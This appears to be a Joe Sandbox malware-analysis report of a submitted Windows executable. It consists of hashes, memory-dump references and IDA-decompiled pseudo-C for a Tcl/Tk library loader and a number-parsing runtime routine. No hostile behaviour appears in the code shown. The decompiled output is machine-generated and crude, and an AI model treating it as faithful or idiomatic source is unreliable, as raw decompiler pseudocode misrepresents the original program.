                                                                                                                                                                                                                                                        • Instruction ID: 1110953726ee7202f948c6f1be8a8a2692b368ce1352627fda7d214067804906
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b98f8205f4dd5ad0f3b4c63852b6076f32f3a1b530b1ff8e23dc59df104b107b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37F0C8727182568ADB998F6CA81272937D0FB087C4F508139D68CC3B04CB3D84509F18
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 03ec394501486fefa8e68c4fc5f22486c81951ca79d36a27091b1f9b4683aa64
                                                                                                                                                                                                                                                        • Instruction ID: 07317f4b5d97fadcf392e169b87f544b0ad4833d5571d088967de74018ee87aa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03ec394501486fefa8e68c4fc5f22486c81951ca79d36a27091b1f9b4683aa64
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19A00122A0C80AD9EA84AB48A86023026A0AF50B04B841031E84DC10A49E2EA840974A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 40%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AB55D0(long long __rax, void* __rcx) {
                                                                                                                                                                                                                                                        				void* __rbx;
                                                                                                                                                                                                                                                        				long long _t11;
                                                                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t11 = __rax;
                                                                                                                                                                                                                                                        				_t12 = __rcx;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB71B0(__rax, __rcx, __rcx + 0x10);
                                                                                                                                                                                                                                                        				 *((long long*)(_t12 + 0x4048)) = _t11;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB71B0(_t11, _t12, _t12 + 0x1010);
                                                                                                                                                                                                                                                        				 *((long long*)(_t12 + 0x4050)) = _t11;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t12 + 0x4048)) == 0) goto 0xe5ab561a;
                                                                                                                                                                                                                                                        				if (_t11 == 0) goto 0xe5ab561a;
                                                                                                                                                                                                                                                        				goto 0xe5ab5f50;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AB2770(_t11, "LOADER: Failed to load tcl/tk libraries\n", _t11, _t22, _t23);
                                                                                                                                                                                                                                                        				return 0xffffffff;
                                                                                                                                                                                                                                                        			}








                                                                                                                                                                                                                                                        0x7ff6e5ab55d0
                                                                                                                                                                                                                                                        0x7ff6e5ab55d6
                                                                                                                                                                                                                                                        0x7ff6e5ab55dd
                                                                                                                                                                                                                                                        0x7ff6e5ab55e9
                                                                                                                                                                                                                                                        0x7ff6e5ab55f0
                                                                                                                                                                                                                                                        0x7ff6e5ab55fc
                                                                                                                                                                                                                                                        0x7ff6e5ab5606
                                                                                                                                                                                                                                                        0x7ff6e5ab560b
                                                                                                                                                                                                                                                        0x7ff6e5ab5615
                                                                                                                                                                                                                                                        0x7ff6e5ab5621
                                                                                                                                                                                                                                                        0x7ff6e5ab5630

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                        • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$LOADER: Failed to load tcl/tk libraries$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                        • API String ID: 2238633743-1453502826
                                                                                                                                                                                                                                                        • Opcode ID: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                                                                                                                                                                                                                        • Instruction ID: eb3c048954404a85f5443e81ba23a323218e3c4e0bf3fb40856036e76d681383
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba523ba2b13c4ea14ee618d69630f35f7ff64aa3d65f3ca8e14aa07d75cb9247
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FE1FB63B19B0790EA95FF1CA87437463A5AF08F84BD45131CD0DC6268EF3EAD48875A
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                        • String ID: P%
                                                                                                                                                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                        • Opcode ID: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                                                                                                                                                        • Instruction ID: 3b9553295a410147a8c5820da549fcbf40148d50cb010b53c3298a1a5b4550dc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2abf96d7e756ec95747b6225775113f5ca3bbb9c1d9d148edce5ba3104c9dbe9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 935106366047A186D624AF26A4282BAB7A1FB98B65F004125EFCFC3684DF3DD445DB14
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC0228(signed short* __rax, long long __rbx, long long __rcx, signed short** __rdx, void* __r8, long long __r10, void* __r11, long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                                                                                                                                                                        				void* _v64;
                                                                                                                                                                                                                                                        				intOrPtr _v72;
                                                                                                                                                                                                                                                        				intOrPtr _v76;
                                                                                                                                                                                                                                                        				intOrPtr _v80;
                                                                                                                                                                                                                                                        				intOrPtr _v84;
                                                                                                                                                                                                                                                        				intOrPtr _v88;
                                                                                                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                                                                                                        				intOrPtr _v96;
                                                                                                                                                                                                                                                        				intOrPtr _v100;
                                                                                                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                                                                                                        				intOrPtr _v108;
                                                                                                                                                                                                                                                        				intOrPtr _v112;
                                                                                                                                                                                                                                                        				intOrPtr _v116;
                                                                                                                                                                                                                                                        				intOrPtr _v120;
                                                                                                                                                                                                                                                        				intOrPtr _v124;
                                                                                                                                                                                                                                                        				intOrPtr _v128;
                                                                                                                                                                                                                                                        				intOrPtr _v132;
                                                                                                                                                                                                                                                        				intOrPtr _v136;
                                                                                                                                                                                                                                                        				intOrPtr _v140;
                                                                                                                                                                                                                                                        				intOrPtr _v144;
                                                                                                                                                                                                                                                        				intOrPtr _v148;
                                                                                                                                                                                                                                                        				intOrPtr _v152;
                                                                                                                                                                                                                                                        				intOrPtr _v156;
                                                                                                                                                                                                                                                        				char _v160;
                                                                                                                                                                                                                                                        				intOrPtr _v164;
                                                                                                                                                                                                                                                        				intOrPtr _v168;
                                                                                                                                                                                                                                                        				long long _v176;
                                                                                                                                                                                                                                                        				long long _v184;
                                                                                                                                                                                                                                                        				void* __rsi;
                                                                                                                                                                                                                                                        				void* __rbp;
                                                                                                                                                                                                                                                        				signed int _t144;
                                                                                                                                                                                                                                                        				void* _t162;
                                                                                                                                                                                                                                                        				signed short _t206;
                                                                                                                                                                                                                                                        				signed short _t207;
                                                                                                                                                                                                                                                        				signed int _t208;
                                                                                                                                                                                                                                                        				signed int _t240;
                                                                                                                                                                                                                                                        				intOrPtr _t254;
                                                                                                                                                                                                                                                        				signed int _t255;
                                                                                                                                                                                                                                                        				signed int _t257;
                                                                                                                                                                                                                                                        				signed int _t259;
                                                                                                                                                                                                                                                        				signed int _t263;
                                                                                                                                                                                                                                                        				signed short* _t380;
                                                                                                                                                                                                                                                        				signed short* _t381;
                                                                                                                                                                                                                                                        				signed short* _t383;
                                                                                                                                                                                                                                                        				signed short** _t384;
                                                                                                                                                                                                                                                        				long long _t385;
                                                                                                                                                                                                                                                        				long long* _t388;
                                                                                                                                                                                                                                                        				signed short* _t389;
                                                                                                                                                                                                                                                        				signed short* _t390;
                                                                                                                                                                                                                                                        				signed short** _t394;
                                                                                                                                                                                                                                                        				long long* _t395;
                                                                                                                                                                                                                                                        				long long* _t396;
                                                                                                                                                                                                                                                        				signed short** _t397;
                                                                                                                                                                                                                                                        				void* _t398;
                                                                                                                                                                                                                                                        				void* _t399;
                                                                                                                                                                                                                                                        				signed short* _t404;
                                                                                                                                                                                                                                                        				signed short* _t405;
                                                                                                                                                                                                                                                        				void* _t407;
                                                                                                                                                                                                                                                        				long long _t408;
                                                                                                                                                                                                                                                        				signed short* _t409;
                                                                                                                                                                                                                                                        				intOrPtr _t410;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t407 = __r11;
                                                                                                                                                                                                                                                        				_t403 = __r8;
                                                                                                                                                                                                                                                        				_t394 = __rdx;
                                                                                                                                                                                                                                                        				_t385 = __rbx;
                                                                                                                                                                                                                                                        				_a24 = __rbx;
                                                                                                                                                                                                                                                        				_a8 = __rcx;
                                                                                                                                                                                                                                                        				_t408 =  *__rdx;
                                                                                                                                                                                                                                                        				r10d = 0;
                                                                                                                                                                                                                                                        				_v64 = _t408;
                                                                                                                                                                                                                                                        				r15d = r8d;
                                                                                                                                                                                                                                                        				_t397 = __rdx;
                                                                                                                                                                                                                                                        				if (_t408 != 0) goto 0xe5ac026f;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(__rax);
                                                                                                                                                                                                                                                        				 *__rax = 0x16;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				goto 0xe5ac02a1;
                                                                                                                                                                                                                                                        				if (r15d == 0) goto 0xe5ac02b9;
                                                                                                                                                                                                                                                        				_t4 = _t403 - 2; // 0xe
                                                                                                                                                                                                                                                        				if (_t4 - 0x22 <= 0) goto 0xe5ac02b9;
                                                                                                                                                                                                                                                        				_v176 = __rcx;
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				 *((char*)(__rcx + 0x30)) = 1;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				 *(__rcx + 0x2c) = 0x16;
                                                                                                                                                                                                                                                        				_v184 = __r10;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4(__rax, __rbx, __rcx, __rdx, _t398, _t399, __r8);
                                                                                                                                                                                                                                                        				_t388 = _t397[1];
                                                                                                                                                                                                                                                        				if (_t388 == 0) goto 0xe5ac08e9;
                                                                                                                                                                                                                                                        				 *_t388 =  *_t397;
                                                                                                                                                                                                                                                        				goto 0xe5ac08e9;
                                                                                                                                                                                                                                                        				_t10 = _t408 + 2; // 0x2
                                                                                                                                                                                                                                                        				_t389 = _t10;
                                                                                                                                                                                                                                                        				_t144 = r9b & 0xffffffff;
                                                                                                                                                                                                                                                        				r14d = r10d;
                                                                                                                                                                                                                                                        				 *_t394 = _t389;
                                                                                                                                                                                                                                                        				_t262 =  !=  ? _t144 : _t144 | 0x00000002;
                                                                                                                                                                                                                                                        				if ((0x0000fffd & _t385 - 0x0000002b) != 0) goto 0xe5ac02f0;
                                                                                                                                                                                                                                                        				_t206 =  *_t389 & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t14 =  &(_t389[1]); // 0x4
                                                                                                                                                                                                                                                        				_t380 = _t14;
                                                                                                                                                                                                                                                        				 *_t397 = _t380;
                                                                                                                                                                                                                                                        				_a16 = 0x9f0;
                                                                                                                                                                                                                                                        				_v168 = 0xa66;
                                                                                                                                                                                                                                                        				_v164 = 0xa70;
                                                                                                                                                                                                                                                        				_v160 = 0xae6;
                                                                                                                                                                                                                                                        				r8d = 0x660;
                                                                                                                                                                                                                                                        				_v156 = 0xaf0;
                                                                                                                                                                                                                                                        				_t20 = _t380 - 0x80; // 0x5e0
                                                                                                                                                                                                                                                        				r11d = _t20;
                                                                                                                                                                                                                                                        				_v152 = 0xb66;
                                                                                                                                                                                                                                                        				r9d = 0x6f0;
                                                                                                                                                                                                                                                        				_v148 = 0xb70;
                                                                                                                                                                                                                                                        				_v144 = 0xc66;
                                                                                                                                                                                                                                                        				_v140 = 0xc70;
                                                                                                                                                                                                                                                        				_v136 = 0xce6;
                                                                                                                                                                                                                                                        				_v132 = 0xcf0;
                                                                                                                                                                                                                                                        				_v128 = 0xd66;
                                                                                                                                                                                                                                                        				_v124 = 0xd70;
                                                                                                                                                                                                                                                        				_v120 = 0xe50;
                                                                                                                                                                                                                                                        				_v116 = 0xe5a;
                                                                                                                                                                                                                                                        				_v112 = 0xed0;
                                                                                                                                                                                                                                                        				_v108 = 0xeda;
                                                                                                                                                                                                                                                        				_v104 = 0xf20;
                                                                                                                                                                                                                                                        				_v100 = 0xf2a;
                                                                                                                                                                                                                                                        				_v96 = 0x1040;
                                                                                                                                                                                                                                                        				_v92 = 0x104a;
                                                                                                                                                                                                                                                        				_v88 = 0x17e0;
                                                                                                                                                                                                                                                        				_v84 = 0x17ea;
                                                                                                                                                                                                                                                        				_v80 = 0x1810;
                                                                                                                                                                                                                                                        				_v76 = 0xff1a;
                                                                                                                                                                                                                                                        				_v72 = 0x19;
                                                                                                                                                                                                                                                        				if ((r15d & 0xffffffef) != 0) goto 0xe5ac065b;
                                                                                                                                                                                                                                                        				if (_t206 - 0x30 < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - 0x3a >= 0) goto 0xe5ac0417;
                                                                                                                                                                                                                                                        				goto 0xe5ac05c2;
                                                                                                                                                                                                                                                        				if (_t206 - 0xff10 >= 0) goto 0xe5ac05b3;
                                                                                                                                                                                                                                                        				if (_t206 - r8w < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - 0x66a >= 0) goto 0xe5ac043f;
                                                                                                                                                                                                                                                        				goto 0xe5ac05c2;
                                                                                                                                                                                                                                                        				if (_t206 - r9w < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - 0x6fa >= 0) goto 0xe5ac045e;
                                                                                                                                                                                                                                                        				goto 0xe5ac05c2;
                                                                                                                                                                                                                                                        				if (_t206 - r11w < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - 0x970 >= 0) goto 0xe5ac047d;
                                                                                                                                                                                                                                                        				goto 0xe5ac05c2;
                                                                                                                                                                                                                                                        				if (_t206 - (_t206 & 0x0000ffff) - r11d < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - _a16 >= 0) goto 0xe5ac049d;
                                                                                                                                                                                                                                                        				goto 0xe5ac05c2;
                                                                                                                                                                                                                                                        				if (_t206 - _v168 < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - _v164 < 0) goto 0xe5ac040d;
                                                                                                                                                                                                                                                        				_t47 =  &_v160; // 0xae6
                                                                                                                                                                                                                                                        				if (_t206 -  *_t47 < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - _v156 < 0) goto 0xe5ac040d;
                                                                                                                                                                                                                                                        				if (_t206 - _v152 < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - _v148 < 0) goto 0xe5ac040d;
                                                                                                                                                                                                                                                        				if (_t206 - _v144 < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - _v140 < 0) goto 0xe5ac040d;
                                                                                                                                                                                                                                                        				if (_t206 - _v136 < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - _v132 < 0) goto 0xe5ac040d;
                                                                                                                                                                                                                                                        				if (_t206 - _v128 < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - _v124 < 0) goto 0xe5ac040d;
                                                                                                                                                                                                                                                        				if (_t206 - _v120 < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - _v116 < 0) goto 0xe5ac040d;
                                                                                                                                                                                                                                                        				if (_t206 - _v112 < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - _v108 < 0) goto 0xe5ac040d;
                                                                                                                                                                                                                                                        				if (_t206 - _v104 < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - _v100 < 0) goto 0xe5ac040d;
                                                                                                                                                                                                                                                        				if (_t206 - _v96 < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - _v92 < 0) goto 0xe5ac040d;
                                                                                                                                                                                                                                                        				if (_t206 - _v88 < 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if (_t206 - _v84 < 0) goto 0xe5ac040d;
                                                                                                                                                                                                                                                        				if ((_t206 & 0x0000ffff) - _v80 - 9 > 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				goto 0xe5ac040d;
                                                                                                                                                                                                                                                        				if (_t206 - _v76 >= 0) goto 0xe5ac05c7;
                                                                                                                                                                                                                                                        				if ((_t206 & 0x0000ffff) - 0xff10 != 0xffffffff) goto 0xe5ac05e9;
                                                                                                                                                                                                                                                        				_t254 = _v72;
                                                                                                                                                                                                                                                        				_t70 = _t389 - 0x41; // 0x6af
                                                                                                                                                                                                                                                        				_t71 = _t389 - 0x61; // 0x68f
                                                                                                                                                                                                                                                        				_t162 = _t71;
                                                                                                                                                                                                                                                        				if (_t70 - _t254 <= 0) goto 0xe5ac05df;
                                                                                                                                                                                                                                                        				if (_t162 - _t254 > 0) goto 0xe5ac064c;
                                                                                                                                                                                                                                                        				if (_t162 - _t254 > 0) goto 0xe5ac05e6;
                                                                                                                                                                                                                                                        				_t72 = _t389 - 0x37; // 0x5d9
                                                                                                                                                                                                                                                        				if (_t72 != 0) goto 0xe5ac064c;
                                                                                                                                                                                                                                                        				_t390 =  *_t397;
                                                                                                                                                                                                                                                        				r9d = 0xffdf;
                                                                                                                                                                                                                                                        				_t255 =  *_t390 & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t73 =  &(_t390[1]); // 0xffe1
                                                                                                                                                                                                                                                        				_t404 = _t73;
                                                                                                                                                                                                                                                        				 *_t397 = _t404;
                                                                                                                                                                                                                                                        				_t74 = _t394 - 0x58; // -63
                                                                                                                                                                                                                                                        				if ((r9w & _t74) == 0) goto 0xe5ac063a;
                                                                                                                                                                                                                                                        				 *_t397 = _t390;
                                                                                                                                                                                                                                                        				_t166 =  !=  ? r15d : 8;
                                                                                                                                                                                                                                                        				r15d =  !=  ? r15d : 8;
                                                                                                                                                                                                                                                        				if (_t255 == 0) goto 0xe5ac065b;
                                                                                                                                                                                                                                                        				if ( *_t390 == _t255) goto 0xe5ac065b;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC4444(_t380);
                                                                                                                                                                                                                                                        				 *_t380 = 0x16;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9DB0();
                                                                                                                                                                                                                                                        				r10d = 0;
                                                                                                                                                                                                                                                        				goto 0xe5ac065b;
                                                                                                                                                                                                                                                        				_t207 =  *_t404 & 0x0000ffff;
                                                                                                                                                                                                                                                        				_t77 =  &(_t404[1]); // 0xffe3
                                                                                                                                                                                                                                                        				_t381 = _t77;
                                                                                                                                                                                                                                                        				 *_t397 = _t381;
                                                                                                                                                                                                                                                        				goto 0xe5ac0651;
                                                                                                                                                                                                                                                        				_t171 =  !=  ? r15d : 0xa;
                                                                                                                                                                                                                                                        				r15d = 0xa;
                                                                                                                                                                                                                                                        				_t172 = ( !=  ? r15d : 0xa) | 0xffffffff;
                                                                                                                                                                                                                                                        				_t79 = (( !=  ? r15d : 0xa) | 0xffffffff) % r15d;
                                                                                                                                                                                                                                                        				_t257 = (( !=  ? r15d : 0xa) | 0xffffffff) % r15d;
                                                                                                                                                                                                                                                        				r11d = 0x61;
                                                                                                                                                                                                                                                        				r9d = 0xa / r15d;
                                                                                                                                                                                                                                                        				r12d = 0xff10;
                                                                                                                                                                                                                                                        				_t82 = _t407 - 0x31; // 0x5af
                                                                                                                                                                                                                                                        				r13d = _t82;
                                                                                                                                                                                                                                                        				if (_t207 - r13w < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if (_t207 - 0x3a >= 0) goto 0xe5ac0696;
                                                                                                                                                                                                                                                        				goto 0xe5ac0825;
                                                                                                                                                                                                                                                        				if (_t207 - r12w >= 0) goto 0xe5ac0815;
                                                                                                                                                                                                                                                        				if (_t207 - 0x660 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if (_t207 - 0x66a >= 0) goto 0xe5ac06bd;
                                                                                                                                                                                                                                                        				goto 0xe5ac0825;
                                                                                                                                                                                                                                                        				if (_t207 - 0x6f0 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				_t83 =  &(_t381[5]); // 0x6fa
                                                                                                                                                                                                                                                        				if (_t207 - _t83 >= 0) goto 0xe5ac06dd;
                                                                                                                                                                                                                                                        				goto 0xe5ac0825;
                                                                                                                                                                                                                                                        				if (_t207 - 0x966 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				_t84 =  &(_t381[5]); // 0x970
                                                                                                                                                                                                                                                        				if (_t207 - _t84 < 0) goto 0xe5ac06d3;
                                                                                                                                                                                                                                                        				_t85 =  &(_t390[0x3b]); // 0x9e6
                                                                                                                                                                                                                                                        				if (_t207 - _t85 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if (_t207 - _a16 < 0) goto 0xe5ac06d3;
                                                                                                                                                                                                                                                        				if (_t207 - _v168 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if (_t207 - _v164 < 0) goto 0xe5ac06d3;
                                                                                                                                                                                                                                                        				if (_t207 - _v160 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if (_t207 - _v156 < 0) goto 0xe5ac06d3;
                                                                                                                                                                                                                                                        				if (_t207 - _v152 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if (_t207 - _v148 < 0) goto 0xe5ac06d3;
                                                                                                                                                                                                                                                        				if (_t207 - _v144 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if (_t207 - _v140 < 0) goto 0xe5ac06d3;
                                                                                                                                                                                                                                                        				if (_t207 - _v136 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if (_t207 - _v132 < 0) goto 0xe5ac06d3;
                                                                                                                                                                                                                                                        				if (_t207 - _v128 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if (_t207 - _v124 < 0) goto 0xe5ac06d3;
                                                                                                                                                                                                                                                        				if (_t207 - _v120 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if (_t207 - _v116 < 0) goto 0xe5ac06d3;
                                                                                                                                                                                                                                                        				if (_t207 - _v112 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if (_t207 - _v108 < 0) goto 0xe5ac06d3;
                                                                                                                                                                                                                                                        				if (_t207 - _v104 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if (_t207 - _v100 < 0) goto 0xe5ac06d3;
                                                                                                                                                                                                                                                        				if (_t207 - _v96 < 0) goto 0xe5ac082a;
                                                                                                                                                                                                                                                        				if (_t207 - _v92 < 0) goto 0xe5ac06d3;
                                                                                                                                                                                                                                                        				if (_t207 - _v88 < 0) goto 0xe5ac082a;
